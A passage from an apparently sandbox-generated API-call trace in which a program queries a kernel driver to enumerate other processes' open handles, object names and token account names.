returned 0x2 [0161.666] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0161.666] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80022cc044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022cc044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.666] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0161.666] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.667] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.667] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.667] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0161.667] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.667] PsAcquireProcessExitSynchronization () returned 0x0 [0161.667] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880051635d0) [0161.667] ObReferenceObjectByHandle (in: Handle=0xa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80027ed140, HandleInformation=0x0) returned 0x0 [0161.667] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.667] PsReleaseProcessExitSynchronization () returned 0x2 [0161.667] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0161.667] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ff5044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ff5044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.667] ObfDereferenceObject (Object=0xfffffa80027ed140) returned 0x1 [0161.667] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.667] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.667] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.667] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0161.667] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.667] PsAcquireProcessExitSynchronization () returned 0x0 [0161.667] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880051635d0) [0161.668] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00191dd00, HandleInformation=0x0) returned 0x0 [0161.668] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.668] PsReleaseProcessExitSynchronization () returned 0x2 [0161.668] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0161.668] ObQueryNameString (in: Object=0xfffff8a00191dd00, ObjectNameInfo=0xfffffa8003206044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003206044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.668] ObfDereferenceObject (Object=0xfffff8a00191dd00) returned 0x1 [0161.668] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.668] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.668] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.668] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0161.668] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.679] PsAcquireProcessExitSynchronization () returned 0x0 [0161.679] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880051635d0) [0161.679] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800218c070, HandleInformation=0x0) returned 0x0 [0161.679] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.679] PsReleaseProcessExitSynchronization () returned 0x2 [0161.679] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0161.680] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fa8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fa8044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.680] ObfDereferenceObject (Object=0xfffffa800218c070) returned 0x1 [0161.680] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.680] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.680] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.680] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0161.680] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.680] PsAcquireProcessExitSynchronization () returned 0x0 [0161.680] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880051635d0) [0161.680] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800218eba0, HandleInformation=0x0) returned 0x0 [0161.680] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.680] PsReleaseProcessExitSynchronization () returned 0x2 [0161.680] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0161.680] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa80030c9044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030c9044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.680] ObfDereferenceObject (Object=0xfffffa800218eba0) returned 0x1 [0161.680] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.680] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.680] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.680] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0161.680] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.680] PsAcquireProcessExitSynchronization () returned 0x0 [0161.680] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880051635d0) [0161.681] ObReferenceObjectByHandle (in: Handle=0xd4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0161.681] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.681] PsReleaseProcessExitSynchronization () returned 0x2 [0161.681] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0161.681] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003034044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003034044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.681] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0161.681] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.681] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.681] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.681] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0161.681] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.681] PsAcquireProcessExitSynchronization () returned 0x0 [0161.681] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880051635d0) [0161.681] ObReferenceObjectByHandle (in: Handle=0xd8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020ab3a0, HandleInformation=0x0) returned 0x0 [0161.681] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.681] PsReleaseProcessExitSynchronization () returned 0x2 [0161.681] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0161.681] ObQueryNameString (in: Object=0xfffffa80020ab3a0, ObjectNameInfo=0xfffffa80030ab044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030ab044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.681] ObfDereferenceObject (Object=0xfffffa80020ab3a0) returned 0x1 [0161.681] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.681] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.681] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.681] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0161.682] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.682] PsAcquireProcessExitSynchronization () returned 0x0 [0161.682] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880051635d0) [0161.682] ObReferenceObjectByHandle (in: Handle=0xe4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0161.682] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.682] PsReleaseProcessExitSynchronization () returned 0x2 [0161.682] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0161.682] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003003044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003003044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.682] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0161.682] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.682] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.682] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.682] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0161.682] PsLookupProcessByProcessId (in: ProcessId=0x730, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.682] PsAcquireProcessExitSynchronization () returned 0x0 [0161.682] KeStackAttachProcess (in: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021a89d0, ApcState=0xfffff880051635d0) [0161.682] ObReferenceObjectByHandle (in: Handle=0xf0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0161.682] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.682] PsReleaseProcessExitSynchronization () returned 0x2 [0161.682] ObfDereferenceObject (Object=0xfffffa80021a89d0) returned 0x1e [0161.682] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa80030c1044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030c1044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.682] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xe [0161.682] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.682] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x81c) returned 0xc8 [0161.682] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0161.683] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa800219db30, HandleInformation=0x0) returned 0x0 [0161.683] ObOpenObjectByPointer (in: Object=0xfffffa800219db30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0161.683] ObfDereferenceObject (Object=0xfffffa800219db30) returned 0xf [0161.683] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa80024ccb80 | out: TokenHandle=0xfffffa80024ccb80*=0xc4) returned 0x0 [0161.683] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0161.683] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.683] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0161.683] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0161.685] CloseHandle (hObject=0xc4) returned 1 [0161.685] CloseHandle (hObject=0xc8) returned 1 [0161.685] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.685] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0161.685] PsLookupProcessByProcessId (in: ProcessId=0x81c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.685] PsAcquireProcessExitSynchronization () returned 0x0 [0161.685] KeStackAttachProcess (in: PROCESS=0xfffffa800219db30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800219db30, ApcState=0xfffff880051635d0) [0161.685] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800219c650, HandleInformation=0x0) returned 0x0 [0161.685] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.685] PsReleaseProcessExitSynchronization () returned 0x2 [0161.685] ObfDereferenceObject (Object=0xfffffa800219db30) returned 0xd [0161.685] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003205044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003205044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.685] ObfDereferenceObject (Object=0xfffffa800219c650) returned 0x1 [0161.685] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.686] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.686] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.686] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0161.686] PsLookupProcessByProcessId (in: ProcessId=0x81c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.686] PsAcquireProcessExitSynchronization () returned 0x0 [0161.686] KeStackAttachProcess (in: PROCESS=0xfffffa800219db30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800219db30, ApcState=0xfffff880051635d0) [0161.686] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001eeb070, HandleInformation=0x0) returned 0x0 [0161.686] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.686] PsReleaseProcessExitSynchronization () returned 0x2 [0161.686] ObfDereferenceObject (Object=0xfffffa800219db30) returned 0xd [0161.686] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030d8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030d8044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.686] ObfDereferenceObject (Object=0xfffffa8001eeb070) returned 0x1 [0161.686] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.686] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0xc8 [0161.686] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0161.686] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001eeb5c0, HandleInformation=0x0) returned 0x0 [0161.686] ObOpenObjectByPointer (in: Object=0xfffffa8001eeb5c0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0161.686] ObfDereferenceObject (Object=0xfffffa8001eeb5c0) returned 0x20 [0161.686] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa80024ccb80 | out: TokenHandle=0xfffffa80024ccb80*=0xc4) returned 0x0 [0161.687] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0161.687] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.687] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0161.687] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0161.689] CloseHandle (hObject=0xc4) returned 1 [0161.689] CloseHandle (hObject=0xc8) returned 1 [0161.689] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.689] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0161.689] PsLookupProcessByProcessId (in: ProcessId=0x84c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.689] PsAcquireProcessExitSynchronization () returned 0x0 [0161.689] KeStackAttachProcess (in: PROCESS=0xfffffa8001eeb5c0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001eeb5c0, ApcState=0xfffff880051635d0) [0161.689] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001eebb00, HandleInformation=0x0) returned 0x0 [0161.689] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.689] PsReleaseProcessExitSynchronization () returned 0x2 [0161.689] ObfDereferenceObject (Object=0xfffffa8001eeb5c0) returned 0x1e [0161.689] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030b4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030b4044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.689] ObfDereferenceObject (Object=0xfffffa8001eebb00) returned 0x1 [0161.689] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.689] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.689] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.689] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0161.689] PsLookupProcessByProcessId (in: ProcessId=0x84c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.689] PsAcquireProcessExitSynchronization () returned 0x0 [0161.689] KeStackAttachProcess (in: PROCESS=0xfffffa8001eeb5c0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001eeb5c0, ApcState=0xfffff880051635d0) [0161.689] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f78b00, HandleInformation=0x0) returned 0x0 [0161.689] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.689] PsReleaseProcessExitSynchronization () returned 0x2 [0161.690] ObfDereferenceObject (Object=0xfffffa8001eeb5c0) returned 0x1e [0161.690] ObQueryNameString (in: Object=0xfffffa8001f78b00, ObjectNameInfo=0xfffffa80030c0044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030c0044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.690] ObfDereferenceObject (Object=0xfffffa8001f78b00) returned 0x1 [0161.690] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.690] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.690] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.690] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0161.690] PsLookupProcessByProcessId (in: ProcessId=0x84c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.690] PsAcquireProcessExitSynchronization () returned 0x0 [0161.690] KeStackAttachProcess (in: PROCESS=0xfffffa8001eeb5c0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001eeb5c0, ApcState=0xfffff880051635d0) [0161.690] ObReferenceObjectByHandle (in: Handle=0x78, DesiredAccess=0x0, 